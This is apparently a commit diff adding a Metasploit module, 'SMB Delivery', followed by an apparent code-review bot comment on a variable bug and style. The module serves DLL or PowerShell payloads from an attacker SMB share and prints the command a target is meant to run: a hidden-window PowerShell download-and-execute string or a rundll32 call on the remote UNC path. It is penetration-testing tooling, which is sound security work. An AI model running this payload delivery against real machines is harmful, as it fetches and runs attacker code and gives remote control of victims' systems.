
Land #7163, Add exploit payload delivery via SMB

wchen-r7 3 years ago
parent
commit
14a387e4eb
1 changed files with 77 additions and 0 deletions
  1. 77
    0
      modules/exploits/windows/smb/smb_delivery.rb

+ 77
- 0
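--- a/modules/exploits/windows/smb/smb_delivery.rb
+++ b/modules/exploits/windows/smb/smb_delivery.rb
@@ -0,0 +1,77 @@
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "SMB Delivery",
+      'Description'    => %q{
+        This module serves payloads via an SMB server and provides commands to retrieve
+        and execute the generated payloads. Currently supports DLLs and Powershell.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Andrew Smith',
+          'Russel Van Tuyl'
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+        'Platform'       => 'win',
+        'Targets'        =>
+          [
+            ['DLL', {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X86_64]
+            }],
+            ['PSH', {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X86_64]
+            }]
+          ],
+        'Privileged'     => false,
+        'DisclosureDate' => "Jul 26 2016",
+        'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll'])
+      ], self.class)
+
+    deregister_options('FILE_CONTENTS')
+  end
+
+  def primer
+    print_status('Run the following command on the target machine:')
+    case target.name
+    when 'PSH'
+      self.file_contents = cmd_psh_payload(  payload.encoded,
+                                             payload_instance.arch.first,
+                                             remove_comspec: true,
+                                             use_single_quotes: true)
+
+      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)
+      download_and_run = "#{ignore_cert}#{download_string}"
+      print_line generate_psh_command_line(  noprofile: true,
+                                             windowstyle: 'hidden',
+                                             command: download_and_run)
+    when 'DLL'
+      self.file_contents = generate_payload_dll
+      print_line("rundll32.exe #{unc},0")
+    end
+  end
+end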
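Review bot: The `ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl` line in the PSH branch of `primer` reads an `ssl` flag that nothing in this file defines or registers, and a TLS-ignore prefix has no meaning for the SMB UNC path that `proxy_aware_download_and_exec_string(unc)` is handed on the next line; unless one of the included mixins supplies `ssl`, the PSH target raises `NameError` the first time `primer` runs, so either drop the line or register the option it is meant to read. The `FILE_NAME` description `'DLL file name'` (with default `test.dll`) appears to name the served file for both targets, so on PSH a PowerShell script is served under a `.dll` name; the description should say `'Name of the served file (DLL or PowerShell script)'` or the module should pick a target-specific default. As a point of style, the `update_info` keys from `'Platform'` onward are indented two spaces deeper than `'Name'` through `'Payload'`, and `cmd_psh_payload(  payload.encoded,` and `generate_psh_command_line(  noprofile: true,` carry a double space after the opening parenthesis.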
